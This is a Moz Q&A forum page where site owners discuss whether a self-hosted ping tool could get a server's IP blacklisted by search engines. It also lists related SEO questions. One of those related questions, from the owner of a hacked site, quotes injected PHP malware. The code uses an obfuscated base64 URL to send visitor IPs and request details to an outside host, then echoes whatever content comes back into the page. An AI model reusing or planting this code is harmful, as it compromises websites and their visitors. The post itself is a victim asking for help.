Can a Self-Hosted Ping Tool Hurt Your IP?
-
Confusing title I know, but let me explain.
We are in the middle of programming a lot of SEO "action" tools for our site. These will be available for users to help better optimize their sites in SERPs. We were thinking about adding a "Ping" tool based in PHP so users can ping their domain and hopefully get some extra attention/speed up indexing of updates.
This would be hosted on a subdomain of our site. My question is: If we get enough users using the product, could that potentially get us blacklisted with Google, Bing etc? Technically it needs to send out the Ping request, and that would be coming from the same IP address that our main site is hosted on. If we end up getting over a 1000 users all trying to send ping requests I don't want to potentially jeopardize our IP.
Thoughts?
-
We are not using Wordpress for any of the tools, and all will be handled using PHP. This is a separate directory from our main site used strictly for the tools. Our main site does not use Wordpress either.
The server resources are not an issue at this time, as we have a very powerful setup.
I am not worried about how many times a subscribed user wants to ping their site. I am more concerned about where the ping is being sent out from and how many times.
-
First of all, there is no certainty that pinging a domain helps get it indexed, submitting a site map in the search console seems like the appropriate way to get that done.
I understand that if you ping your site when you update content it can let many sites, RSS feeds, and search engines know about it, but if you ping too much you risk getting blacklisted.
Second, it seems that using your server to send out many pings may slow down response time and therefor slow page load speed for your site which definitely has a negative effect on SEO.
Thirdly, if you can host the service on a separate IP, that would seem like the best course of action because if it gets blacklisted you can just start using a different one, don't risk your domains IP to get blacklisted.
Maybe, I'm missing something here but if you are using WordPress, doesn't that automatically create an auto-updating /feed/ URL for your site?
The following is from - https://en.support.wordpress.com/comments/pingbacks/
Granted I am using WordPress so that is mostly what I focus on. Are you using a different CMS?
How do I send out update pings?
Many services like Technorati, Feedster, Icerocket, Google Blog Search, and others want a “ping” from you to know you’ve updated so they can index your content. WordPress.com handles it all for you. When you post, we send a ping using Ping-o-Matic!, is a service that pings several different search providers all at once including Technorati, My Yahoo!, and Google Blog Search.
Pings are automatically sent if you have a public blog. If your blog is private or if you block search engines, pings will not be sent.
-
Yup!
Use "javascript" on client site to do pinging. Or Java app running from web as applet. Or Flash.
There are two major problems - javascript doesn't support cross-platform post without hacks. And not all computers comes with Java. Same is with Flash.
-
Thank you for your response. As to the IP getting blacklisted, since we have full server control we could always assign another dedicated IP address to the site. The issue is that we would not know if and when it happened to take such action. Obviously, we don't want to have to do this, and it could create headaches if the main site IP is blacklisted for our search position until we get it resolved.
We are also planning on adding in website submission limits. For example, you could only submit mysitehere.com up to 3 times per month per subscriber account. The only way they could spam the system is to create another account and sign up all over again. I doubt anyone would go through that much effort, but I could be wrong.
Thoughts?
-
TL;DR - YES
Long story - i'm author of similar desktop tool called SEOPingler:
http://www.mobiliodevelopment.com/seopingler/
so anyone you can use to ping anything. And bots are coming within second or two. This works perfect.The problem is when you use this to ping many URLs (like 10k-20k). At some time this stop working and ping API endpoint receive your request but i can't see that bots are coming. This mean that there is some threshold that if you pass it for IP and you're temporary blacklisted. I also heard (but i can't confirm this) that this temporary may vary due previous usage. For me this isn't problem because users can blacklist their own IPs. And they can use hotspot wifi internet or VPN for continuing pinging.
But on server this will be HUGE problem because you can't switch IPs on-fly. And no one can guarantee how long your IP will be blacklisted.
Got a burning SEO question?
Subscribe to Moz Pro to gain full access to Q&A, answer questions, and ask your own.
Browse Questions
Explore more categories
-
Moz Tools
Chat with the community about the Moz tools.
-
SEO Tactics
Discuss the SEO process with fellow marketers
-
Community
Discuss industry events, jobs, and news!
-
Digital Marketing
Chat about tactics outside of SEO
-
Research & Trends
Dive into research and trends in the search industry.
-
Support
Connect on product support and feature requests.
Related Questions
-
Can I create a new Website to promote just one set of services from a list of several services?
Hi, I have a 10 years old website, where I promote all my services - around 30 of them under 5 main categories. For example, my current website promotes these services. A service - with a1, a2, a3 services B service - with b1, b2, b3 services C service - with c1, c2, c3 services D service - with d1, d2, d3 services E service - with e1, e2, e3 services Now I want to promote just "A service" with its sub-services into a separate website, as that service is in demand now and also those keywords should be my main keywords. I want to connect my old website with the new one, to increase the trust among users. Can I do this? I hope I am not violating any Google rules by doing this. Please help with suggestions. Thanks. Jessi.
White Hat / Black Hat SEO | | Sudsat0 -
What would you say is hurting this site, Penguin or Panda?
Would you say this is both Penguin and Panda and no penalty has ever been lifted? What would be your general recommendations for this site? seWnoQm
White Hat / Black Hat SEO | | BobGW0 -
Besides description and design optimization, is there any other main factor that we can influence to get better App Store rankings?
Hi there! I do love SEO, the cracking Web Search engine, but when it comes to other Google's search engines like Youtube and Apps Store it's an unknown field for me.
White Hat / Black Hat SEO | | Gaston Riera
So, i'm diving into App Store Optimization, ASO. This is my question: Besides the text and the design in the description of the app, is there any other factor that we can manipulate or influence?(such as linkbuilding, social media or alien magic hehe). Thanks a lot!
GR.0 -
If I am getting links on competitor websites, is it safe to assume those competitors are doing this to hurt our SEO?
We have received a few notification from Google Webmaster Tools and Moz that our competitors have "mentioned" our page on their website. This is incredibly odd as you wouldn't think they'd want to do this. Further, when I go to the page that we are supposedly mentioned on, the link to our site is not on the page. What is going on? Thank you in advance for your insights!!
White Hat / Black Hat SEO | | brits0 -
Website has been hacked will this hurt ranking
Today we found out that a website of as has been hacked and that they put this code in multiple index.php files: if (!isset($sRetry))
White Hat / Black Hat SEO | | GTGshops
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 8);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?> After some search I found other people mentioning this problem too.They were also talking about that this could have impact on your search rankings. My first question : Will this hurt my rankings ? Second question: Is there something I can do to tell the search engines about the hack so that we don't lose ranking on this. Grtz, Ard0 -
Creating duplicate site for testing purpose. Can it hurt original site
Hello, We are soon going to upgrade the cms to latest version along with new functionlaities - the process may take anywhere from 4 week to 6 weeks. may suggest - we need to work on live server, what we have planned take exact replica of site and move to a test domain, but on live server Block Google, Bing, Yahoo - User-agent: Google Disallow: / , User-agent: Bing Disallow: / User-agent: Yahoo Disallow: / in robots.txt Will upgrade CMS and add functionality - will test the entire structure, check url using screaming frog or xenu and move on to configure the site on original domain The process upgradation and new tools may take 1 - 1.5 month.... Concern is that despite blocking Google, Bing & Yahoo through User agent disallow - can still the url can be crawled by the search engines - if yes - it may hurt the original site as will read on as entire duplicate or is there any alternate way around.. Many thanks
White Hat / Black Hat SEO | | Modi1 -
SERPs recovery? When can I believe it?
Here's a happy story: Some of you folks with sharp memories may remember my questions and worry over the last 3+ months regarding our fall into the abyss on Google after great positions for over a decade (we've always been fine in Bing and Yahoo). And our company name URL was still #1 so no site-wide penalty. Well......I've been working hard on fixing this in a smart way with all the ingredients I've been learning about. Thank you to SEOMozers for all the help!! There's still plenty to do, especially in the link earning department, but I've come really far from where I was in the Fall. Anyway. I am here right now to report what may be true to life fantastic news. I was starting to suspect an improvement last week, but it proved to be wrong. Then, I saw another sign yesterday but couldn't trust it. Today, my latest SEOMoz report is showing me the following for the several keywords we lost position down to "not in the top 50" for. keyword 1: up 44 points to #6keyword 2: no change still at #4
White Hat / Black Hat SEO | | gfiedel
keyword 3: up 46 points to # 4
keyword 4: up 43 points to #7
keyword 5: up 46 points to #4
keyword 6: up 2 points to #2 What I'm wondering is if this is real. ;o). I'm pinching myself. I realize that it could be one of those sliding readjustment things and we'll drop back down, but we are not a new site. It seems that even if that is the case, it still must illustrate something good. Some kind of elimination of possibilities for why the drop occurred in the first place. I did a few things in this past week that may have put it over the tipping point. One of which was signing up for adwords a week ago. I'm happy to give details if anyone is interested. A few specific questions: 1. What might this be showing me?
2. We have about a 45% number of anchor text footer links in client sites (we're a web dev co) one or two of which are numbering in the hundreds have keywords in them and are continuing to generate more links due to ecomm and large databases. I was gearing up to remove them or get them moved out of the footer so there's only one, but now I'm afraid to touch anything. Most of the footer links are just our company name or "site design". Any suggestions? 3. any other bits of advice for this situation are appreciated. I don't want to blow it now! Thanks!0 -
Can a Page Title be all UPPER CASE?
My clients wants to use UPPER CASE for all his page titles. Is this okay? Does Google react badly to this?
White Hat / Black Hat SEO | | petewinter0